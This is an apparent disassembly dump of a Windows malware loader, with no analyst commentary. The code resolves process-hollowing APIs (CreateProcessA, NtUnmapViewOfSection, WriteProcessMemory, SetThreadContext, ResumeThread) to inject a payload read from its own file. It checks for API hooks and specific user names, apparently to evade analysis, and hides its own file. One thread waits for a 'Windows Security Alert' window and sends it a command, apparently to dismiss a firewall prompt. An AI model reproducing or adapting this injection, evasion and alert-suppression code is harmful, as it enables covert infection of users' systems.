sub_4019CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019FA proc near ; CODE XREF: WinMain(x,x,x,x)+5A�p
Buffer = byte ptr -1
push ebp
mov ebp, esp
push ecx
push ebx
push offset aCreateprocessa ; "CreateProcessA"
push offset aKernel32_dll_0 ; "KERNEL32.dll"
xor ebx, ebx
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
push ebx ; lpNumberOfBytesRead
push 1 ; nSize
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
push eax ; lpBaseAddress
call ds:GetCurrentProcess ; GetCurrentProcess
push eax ; hProcess
call ds:ReadProcessMemory ; ReadProcessMemory
cmp [ebp+Buffer], 0E9h
jnz short loc_401A35
mov bl, 1
loc_401A35: ; CODE XREF: sub_4019FA+37�j
mov al, bl
pop ebx
leave
retn
sub_4019FA endp
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: WinMain(x,x,x,x)+24�o
push ebx
push ebp
push esi
push edi
mov edi, ds:FindWindowA
mov ebx, offset WindowName ; "Windows Security Alert"
push ebx ; lpWindowName
push 0 ; lpClassName
call edi ; FindWindowA
mov ebp, ds:Sleep
jmp short loc_401A5F
; ---------------------------------------------------------------------------
loc_401A56: ; CODE XREF: StartAddress+29�j
push 1Eh ; dwMilliseconds
call ebp ; Sleep
push ebx ; lpWindowName
push 0 ; lpClassName
call edi ; FindWindowA
loc_401A5F: ; CODE XREF: StartAddress+1A�j
mov esi, eax
test esi, esi
jz short loc_401A56
push 0 ; lParam
push 68h ; wParam
push 111h ; Msg
push esi ; hWnd
call ds:SendMessageA ; SendMessageA
mov edi, ds:IsWindow
jmp short loc_401A81
; ---------------------------------------------------------------------------
loc_401A7D: ; CODE XREF: StartAddress+4C�j
push 32h ; dwMilliseconds
call ebp ; Sleep
loc_401A81: ; CODE XREF: StartAddress+41�j
push esi ; hWnd
call edi ; IsWindow
test eax, eax
jnz short loc_401A7D
pop edi
pop esi
pop ebp
pop ebx
retn 4
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+186�p
Context = CONTEXT ptr -528h
flOldProtect = dword ptr -25Ch
FileName = byte ptr -17Ch
var_7C = dword ptr -7Ch
ProcessInformation= _PROCESS_INFORMATION ptr -3Ch
var_2C = dword ptr -2Ch
lpAddress = dword ptr -14h
dwSize = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 528h
push ebx
push esi
push edi
push 100h ; nSize
lea eax, [ebp+FileName]
push eax ; lpFilename
xor ebx, ebx
push ebx ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push ebx ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset StartAddress ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call ds:CreateThread ; CreateThread
lea eax, [ebp+FileName]
push eax ; lpFileName
push ebx ; int
call sub_401881
pop ecx
pop ecx
call sub_40196F
test al, al
jnz loc_401C4E
call sub_4019CA
test eax, eax
jnz loc_401C4E
call sub_4019FA
test al, al
jnz loc_401C4E
push 6 ; dwFileAttributes
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
mov esi, ds:GetModuleHandleA
push offset aVirtualalloc ; "VirtualAlloc"
push offset ModuleName ; "kernel32.dll"
call esi ; GetModuleHandleA
mov edi, ds:GetProcAddress
push eax ; hModule
call edi ; GetProcAddress
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+flOldProtect]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_7C]
push ebx
push eax
call sub_4011C8
add esp, 14h
test al, al
jz loc_401C43
push [ebp+var_C]
lea eax, [ebp+flOldProtect]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_7C]
push eax
call sub_4013B0
add esp, 10h
push 40h
push 1000h
push eax
push ebx
mov [ebp+var_8], eax
call [ebp+var_4]
push eax ; Dst
push [ebp+var_C] ; int
mov dword_4362B0, eax
lea eax, [ebp+flOldProtect]
push eax ; Size
push ebx ; int
lea eax, [ebp+var_2C]
push eax ; int
lea eax, [ebp+var_7C]
push eax ; int
call sub_401425
push ebx
lea eax, [ebp+lpAddress]
push eax ; int
lea eax, [ebp+Context]
push eax ; lpContext
push ebx ; int
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+FileName]
push eax ; lpCommandLine
call sub_401613
add esp, 30h
push offset aWriteprocessme ; "WriteProcessMemory"
push offset ModuleName ; "kernel32.dll"
call esi ; GetModuleHandleA
push eax ; hModule
call edi ; GetProcAddress
push [ebp+dwSize] ; dwSize
mov [ebp+var_4], eax
push [ebp+lpAddress] ; lpAddress
mov ecx, 0B3h
sub esp, 2CCh
mov edi, esp
sub esp, 10h
lea esi, [ebp+Context]
rep movsd
mov edi, esp
lea eax, [ebp+FileName]
push eax ; int
push [ebp+var_8] ; int
lea esi, [ebp+ProcessInformation]
push dword_4362B0 ; int
movsd
push [ebp+var_C] ; int
movsd
lea eax, [ebp+flOldProtect]
push eax ; flOldProtect
push ebx ; int
lea eax, [ebp+var_2C]
movsd
push eax ; int
lea eax, [ebp+var_7C]
push eax ; int
movsd
call sub_4016EE
add esp, 304h
push ebx
push [ebp+var_8]
push dword_4362B0
push dword_4362C0
push dword_4362B4
call [ebp+var_4]
test eax, eax
setnz al
mov byte_4362B8, al
push [ebp+var_8]
push ebx
call sub_401855
pop ecx
pop ecx
loc_401C43: ; CODE XREF: WinMain(x,x,x,x)+B2�j
push 0BB8h ; dwMilliseconds
call ds:Sleep ; Sleep
loc_401C4E: ; CODE XREF: WinMain(x,x,x,x)+47�j
; WinMain(x,x,x,x)+54�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403982 proc near ; CODE XREF: start:loc_402235�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_406858
call __SEH_prolog
mov [ebp+var_1C], offset dword_40704C
loc_403995: ; CODE XREF: sub_403982+3C�j
cmp [ebp+var_1C], offset dword_40704C
jnb short loc_4039C0
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_4039B6
call eax
jmp short loc_4039B6
; ---------------------------------------------------------------------------
loc_4039AF: ; DATA XREF: .rdata:stru_406858�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4039B3: ; DATA XREF: .rdata:stru_406858�o
mov esp, [ebp+ms_exc.old_esp]
loc_4039B6: ; CODE XREF: sub_403982+27�j
; sub_403982+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_403995
; ---------------------------------------------------------------------------
loc_4039C0: ; CODE XREF: sub_403982+1A�j
call __SEH_epilog
retn
sub_403982 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_4039C6()
sub_4039C6 proc near ; DATA XREF: __cinit:loc_402F32�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_406868
call __SEH_prolog
mov [ebp+var_1C], offset dword_407054
loc_4039D9: ; CODE XREF: sub_4039C6+3C�j
cmp [ebp+var_1C], offset dword_407054
jnb short loc_403A04
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_4039FA
call eax
jmp short loc_4039FA
; ---------------------------------------------------------------------------
loc_4039F3: ; DATA XREF: .rdata:stru_406868�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4039F7: ; DATA XREF: .rdata:stru_406868�o
mov esp, [ebp+ms_exc.old_esp]
loc_4039FA: ; CODE XREF: sub_4039C6+27�j
; sub_4039C6+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_4039D9
; ---------------------------------------------------------------------------
loc_403A04: ; CODE XREF: sub_4039C6+1A�j
call __SEH_epilog
retn
sub_4039C6 endp
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_404305. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4042F1 proc near ; DATA XREF: .rdata:stru_4068E8�o
xor eax, eax
inc eax
retn
sub_4042F1 endp
; =============== S U B R O U T I N E =======================================
sub_4042F5 proc near ; DATA XREF: .rdata:stru_4068E8�o
mov esp, [ebp-18h]
sub_4042F5 endp ; sp-analysis failed
; [0000000C BYTES: COLLAPSED CHUNK OF FUNCTION sub_404305. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; [0000000E BYTES: COLLAPSED FUNCTION sub_404305. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_408290
jmp short loc_404858
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
__allmul:
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_4057B9
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4057B9: ; CODE XREF: .text:004057AE�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_405858 proc near ; DATA XREF: .data:00408008�o
push offset aReadprocessmem ; "ReadProcessMemory"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4362C4, eax
retn
sub_405858 endp
; =============== S U B R O U T I N E =======================================
sub_405875 proc near ; DATA XREF: .data:0040800C�o
push offset aSetthreadconte ; "SetThreadContext"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4362CC, eax
retn
sub_405875 endp
; =============== S U B R O U T I N E =======================================
sub_405892 proc near ; DATA XREF: .data:00408010�o
push offset aNtunmapviewofs ; "NtUnmapViewOfSection"
push offset LibFileName ; "ntdll.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4362C8, eax
retn
sub_405892 endp
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 00006000)
; Virtual size : 00001690 ( 5776.)
; Section size in file : 00001800 ( 6144.)
; Offset to raw data for section: 00004E00
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall GetUserNameA(LPSTR lpBuffer, LPDWORD pcbBuffer)
extrn GetUserNameA:dword ; CODE XREF: sub_40196F+24�p
; DATA XREF: sub_40196F+24�r
;
; Imports from KERNEL32.dll
;
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_401000+22�p
; ___crtMessageBoxA+18�p
; DATA XREF: ...
; SIZE_T __stdcall VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength)
extrn VirtualQueryEx:dword ; CODE XREF: sub_4015FB+11�p
; DATA XREF: sub_4015FB+11�r
; BOOL __stdcall GetThreadContext(HANDLE hThread, LPCONTEXT lpContext)
extrn GetThreadContext:dword ; CODE XREF: sub_401613+46�p
; DATA XREF: sub_401613+46�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_401613+2A�p
; DATA XREF: sub_401613+2A�r
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_4016EE+E2�p
; sub_4019FA+11�p ...
; BOOL __stdcall VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)
extrn VirtualProtectEx:dword ; CODE XREF: sub_4016EE+3A�p
; DATA XREF: sub_4016EE+3A�r
; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAllocEx:dword ; CODE XREF: sub_4016EE+72�p
; sub_4016EE+9E�p
; DATA XREF: ...
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: sub_401855+D�p
; DATA XREF: sub_401855+D�r
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_401881+52�p
; DATA XREF: sub_401881+52�r
; DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh)
extrn GetFileSize:dword ; CODE XREF: sub_401881+28�p
; DATA XREF: sub_401881+28�r
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_401881+1B�p
; sub_4019CA+17�p
; DATA XREF: ...
; int __stdcall lstrcmpA(LPCSTR lpString1, LPCSTR lpString2)
extrn lstrcmpA:dword ; CODE XREF: sub_40196F+3D�p
; sub_40196F+4C�p
; DATA XREF: ...
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_4019CA+23�p
; DATA XREF: sub_4019CA+23�r
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
extrn ReadProcessMemory:dword ; CODE XREF: sub_4019FA+2D�p
; DATA XREF: sub_4019FA+2D�r
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_4019FA+26�p
; _doexit+13�p
; DATA XREF: ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: StartAddress+1E�p
; StartAddress+45�p ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName, DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: WinMain(x,x,x,x)+70�p
; DATA XREF: WinMain(x,x,x,x)+70�r
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: WinMain(x,x,x,x)+2B�p
; DATA XREF: WinMain(x,x,x,x)+2B�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: WinMain(x,x,x,x)+1B�p
; __NMSG_WRITE+81�p ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: __heap_alloc+3E�p
; ___sbh_heap_init+D�p ...
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: start+160�p
; __ioinit+57�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: start:loc_40224E�p
; DATA XREF: start:loc_40224E�r
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: start+20�p
; DATA XREF: start+20�r
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: __heap_init+44�p
; DATA XREF: __heap_init+44�r
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: __heap_init+11�p
; DATA XREF: __heap_init+11�r
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: ___sbh_free_block+247�p
; ___sbh_free_block+2A2�p
; DATA XREF: ...
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: ___sbh_free_block+2B4�p
; ___sbh_alloc_new_region+95�p ...
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+7E�p
; ___sbh_alloc_new_group+52�p ...
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
extrn HeapReAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+27�p
; _realloc+FD�p ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: unknown_libname_1+29�p
; sub_404305-7�p
; DATA XREF: ...
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401000+3B�p
; sub_401000+46�p ...
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: __NMSG_WRITE+155�p
; DATA XREF: __NMSG_WRITE+155�r
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
extrn GetStdHandle:dword ; CODE XREF: __NMSG_WRITE+14E�p
; __ioinit+157�p
; DATA XREF: ...
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
extrn UnhandledExceptionFilter:dword ; CODE XREF: __XcptFilter+167�p
; DATA XREF: __XcptFilter+167�r
; BOOL __stdcall FreeEnvironmentStringsA(LPCH)
extrn FreeEnvironmentStringsA:dword
; CODE XREF: ___crtGetEnvironmentStringsA+113�p
; DATA XREF: ___crtGetEnvironmentStringsA+113�r
; LPCH __stdcall GetEnvironmentStrings()
extrn GetEnvironmentStrings:dword
; CODE XREF: ___crtGetEnvironmentStringsA:loc_40378C�p
; DATA XREF: ___crtGetEnvironmentStringsA:loc_40378C�r
; BOOL __stdcall FreeEnvironmentStringsW(LPWCH)
extrn FreeEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+C1�p
; DATA XREF: ___crtGetEnvironmentStringsA+C1�r
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword
; CODE XREF: ___crtGetEnvironmentStringsA+86�p
; ___crtGetEnvironmentStringsA+A8�p ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword
; CODE XREF: ___crtGetEnvironmentStringsA:loc_4036E5�p
; ___crtLCMapStringA:loc_404E10�p ...
; LPWCH __stdcall GetEnvironmentStringsW()
extrn GetEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+1C�p
; ___crtGetEnvironmentStringsA+52�p
; DATA XREF: ...
; UINT __stdcall SetHandleCount(UINT uNumber)
extrn SetHandleCount:dword ; CODE XREF: __ioinit+19C�p
; DATA XREF: __ioinit+19C�r
; DWORD __stdcall GetFileType(HANDLE hFile)
extrn GetFileType:dword ; CODE XREF: __ioinit+FE�p
; __ioinit+165�p
; DATA XREF: ...
; UINT __stdcall GetACP()
extrn GetACP:dword ; CODE XREF: __setmbcp+42�p
; DATA XREF: __setmbcp+42�r
; UINT __stdcall GetOEMCP()
extrn GetOEMCP:dword ; CODE XREF: __setmbcp+2B�p
; DATA XREF: __setmbcp+2B�r
; BOOL __stdcall GetCPInfo(UINT CodePage, LPCPINFO lpCPInfo)
extrn GetCPInfo:dword ; CODE XREF: _setSBUpLow+1C�p
; __setmbcp+93�p ...
